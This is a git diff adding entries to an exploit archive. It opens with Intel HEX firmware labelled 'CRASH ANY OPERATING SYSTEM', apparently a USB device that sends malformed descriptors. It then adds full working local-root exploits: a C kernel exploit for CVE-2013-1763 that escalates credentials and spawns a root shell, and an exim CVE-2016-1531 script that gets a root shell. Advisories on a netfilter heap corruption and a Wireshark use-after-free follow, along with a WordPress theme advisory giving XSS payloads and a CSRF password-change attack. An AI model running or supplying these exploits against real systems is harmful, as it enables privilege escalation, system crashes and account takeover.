+:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E +:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:1014200000000040580403500001010203010902BA +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 +:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF diff --git a/platforms/linux/dos/39545.txt b/platforms/linux/dos/39545.txt new file mode 100755 index 000000000..ee14922c4 --- /dev/null +++ b/platforms/linux/dos/39545.txt @@ -0,0 +1,23 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=758 + +A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl is can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing. + +In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset: + +newpos = pos + e->next_offset; +... +e = (struct ipt_entry *) (entry0 + newpos); +e->counters.pcnt = pos; + +This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero. + +This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well. + +Furthermore, a recent refactoring cof this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4. + +Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl! + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39545.zip + diff --git a/platforms/linux/local/33336.c b/platforms/linux/local/33336.c new file mode 100755 index 000000000..8a6d85c37 --- /dev/null +++ b/platforms/linux/local/33336.c @@ -0,0 +1,164 @@ +/* +* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 +* bug found by Spender +* poc by SynQ +* +* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux +* using nl_table->hash.rehash_time, index 81 +* +* Fedora 18 support added +* +* 2/2013 +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); +_commit_creds commit_creds; +_prepare_kernel_cred prepare_kernel_cred; +unsigned long sock_diag_handlers, nl_table; + +int __attribute__((regparm(3))) +kernel_code() +{ + commit_creds(prepare_kernel_cred(0)); + return -1; +} + +int jump_payload_not_used(void *skb, void *nlh) +{ + asm volatile ( + "mov $kernel_code, %eax\n" + "call *%eax\n" + ); +} + +unsigned long +get_symbol(char *name) +{ + FILE *f; + unsigned long addr; + char dummy, sym[512]; + int ret = 0; + + f = fopen("/proc/kallsyms", "r"); + if (!f) { + return 0; + } + + while (ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); + if (ret == 0) { + fscanf(f, "%s\n", sym); + continue; + } + if (!strcmp(name, sym)) { + printf("[+] resolved symbol %s to %p\n", name, (void *) addr); + fclose(f); + return addr; + } + } + fclose(f); + + return 0; +} + +int main(int argc, char*argv[]) +{ + int fd; + unsigned family; + struct { + struct nlmsghdr nlh; + struct unix_diag_req r; + } req; + char buf[8192]; + + if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ + printf("Can't create sock diag socket\n"); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = sizeof(req); + req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; + req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; + req.nlh.nlmsg_seq = 123456; + + //req.r.sdiag_family = 89; + req.r.udiag_states = -1; + req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; + + if(argc==1){ + printf("Run: %s Fedora|Ubuntu\n",argv[0]); + return 0; + } + else if(strcmp(argv[1],"Fedora")==0){ + commit_creds = (_commit_creds) get_symbol("commit_creds"); + prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); + sock_diag_handlers = get_symbol("sock_diag_handlers"); + nl_table = get_symbol("nl_table"); + + if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ + printf("some symbols are not available!\n"); + exit(1); + } + + family = (nl_table - sock_diag_handlers) / 4; + printf("family=%d\n",family); + req.r.sdiag_family = family; + + if(family>255){ + printf("nl_table is too far!\n"); + exit(1); + } + } + else if(strcmp(argv[1],"Ubuntu")==0){ + commit_creds = (_commit_creds) 0xc106bc60; + prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0; + req.r.sdiag_family = 81; + } + + unsigned long mmap_start, mmap_size; + mmap_start = 0x10000; + mmap_size = 0x120000; + printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); + + if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { + printf("mmap fault\n"); + exit(1); + } + memset((void*)mmap_start, 0x90, mmap_size); + + char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm + unsigned long *asd = &jump[4]; + *asd = (unsigned long)kernel_code; + + memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); + + if ( send(fd, &req, sizeof(req), 0) < 0) { + printf("bad send\n"); + close(fd); + return -1; + } + + printf("uid=%d, euid=%d\n",getuid(), geteuid() ); + + if(!getuid()) + system("/bin/sh"); + +} \ No newline at end of file diff --git a/platforms/linux/local/39535.sh b/platforms/linux/local/39535.sh new file mode 100755 index 000000000..5d720c2ee --- /dev/null +++ b/platforms/linux/local/39535.sh @@ -0,0 +1,23 @@ +#!/bin/sh +# CVE-2016-1531 exim <= 4.84-3 local root exploit +# =============================================== +# you can write files as root or force a perl module to +# load by manipulating the perl environment and running +# exim with the "perl_startup" arguement -ps. +# +# e.g. +# [fantastic@localhost tmp]$ ./cve-2016-1531.sh +# [ CVE-2016-1531 local root exploit +# sh-4.3# id +# uid=0(root) gid=1000(fantastic) groups=1000(fantastic) +# +# -- Hacker Fantastic +echo [ CVE-2016-1531 local root exploit +cat > /tmp/root.pm << EOF +package root; +use strict; +use warnings; + +system("/bin/sh"); +EOF +PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps diff --git a/platforms/multiple/dos/39529.txt b/platforms/multiple/dos/39529.txt new file mode 100755 index 000000000..7f4e62ede --- /dev/null +++ b/platforms/multiple/dos/39529.txt @@ -0,0 +1,71 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=739 + +The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8 +READ of size 4 at 0x60400009d960 thread T0 + #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20 + #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4 + #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3 + #3 0x51e4bc in main wireshark/tshark.c:2213:13 + +0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978) +freed by thread T0 here: + #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30 + #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9 + #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4 + #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3 + #4 0x51e4bc in main wireshark/tshark.c:2213:13 + +previously allocated by thread T0 here: + #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) + #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35 + #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7 + #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12 + #5 0x51e4bc in main wireshark/tshark.c:2213:13 + +SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free +Shadow bytes around the buggy address: + 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa +=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa + 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa + 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa + 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa + 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa + 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==6853==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip + diff --git a/platforms/php/webapps/39534.html b/platforms/php/webapps/39534.html new file mode 100755 index 000000000..b8a220734 --- /dev/null +++ b/platforms/php/webapps/39534.html @@ -0,0 +1,42 @@ + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/39536.txt b/platforms/php/webapps/39536.txt new file mode 100755 index 000000000..10126a52f --- /dev/null +++ b/platforms/php/webapps/39536.txt @@ -0,0 +1,148 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA256 + + +=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 === + +Wordpress ProjectTheme Multiple Vulnerabilities +- - ------------------------------------------------------------ + +Affected Version +================ +Project Theme: 2.0.9.5 + +Problem Overview +================ +Technical Risk: high +Likelihood of Exploitation: low +Vendor: http://sitemile.com/ +Credits: LSE Leading Security Experts GmbH employee Tim Herres +Advisory: https://www.lsexperts.de/advisories/lse-2016-01-01.txt +Advisory Status: public +CVE-Number: [NA yet] + +Problem Impact +============== +During an internal code review multiple vulnerabilities were identified. +The whole application misses input validation and output encoding. This means user supplied input is inserted in a unsafe way. +This could allow a remote attacker to easily compromise user accounts. + +Example: +An authenticated user sends a private message to another user. +When the attacker injects JavaScript Code, it will automatically call the CSRF Proc below. +The only necessary information is the user id, which can be identified easily, see below. +If the other user opens the private message menu, the JavaScript code gets executed and the Password will be changed. It is not necessary to open the message. +Now the attacker can access the account using the new password. + +Problem Description +=================== +The following findings are only examples, the whole application should be reviewed for similar vulnerabilities. + +#Stored Cross Site Scripting: +Creating a new project http://[URL]/post-new/? in the project title and description field. +Insert JavaScript code inside the project message board: +POST /?get_message_board=34 HTTP/1.1 +sumbit_message=1&my_message=TestMessagBoard +Also in the private message in the subject or in the message field. The payload in the Subject will be executed, if the user opens the private message list. + +#Reflected Cross Site Scripting: +http://[IP]/advanced-search/?term=asdf&%22%3E%3Cscript%3Ealert%2811%29%3C%2fscript%3E + +# No protection against Cross Site Request Forgery Attacks +There is no Cross Site Request Forgery protection. +Also the user password can be changed without knowledge of the current password. +A possible CSRF attack form, which will change the users password to "test": + + + +
+ +
+ + + +#Getting user id +In a published project there is a button contact project owner with the corresponding UID --> url: http://[IP]/my-account/private-messages/?rdr=&pg=send&uid=1&pid=34. +Also a mouseover in the user profile (Feedback) will reveal the userid. + + +Temporary Workaround and Fix +============================ +No fix + +History +======= +2015-12-20 Problem discovery during code review +2016-01-12 Vendor contacted +2016-01-12 Vendor response (check in progress) +2016-01-26 Vendor contacted (asked for status update) +2016-01-26 Vendor reponse (check in progress) +2016-02-05 Vendor contacted (advisory will be released in 30 days) +2016-03-07 Vendor contacted (asked for last status update) +2016-03-07 Vendor response (vulnerabilities should be fixed in the last update 2.0.9.7 on 1st march 2016, not verified by the LSE) +2016-03-08 Advisory release +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v2 + +iQIcBAEBCAAGBQJW3ojFAAoJEDgSCSGZ4yd8iQIQAOYTS8WaW0Tkw8JMwssV/N8F 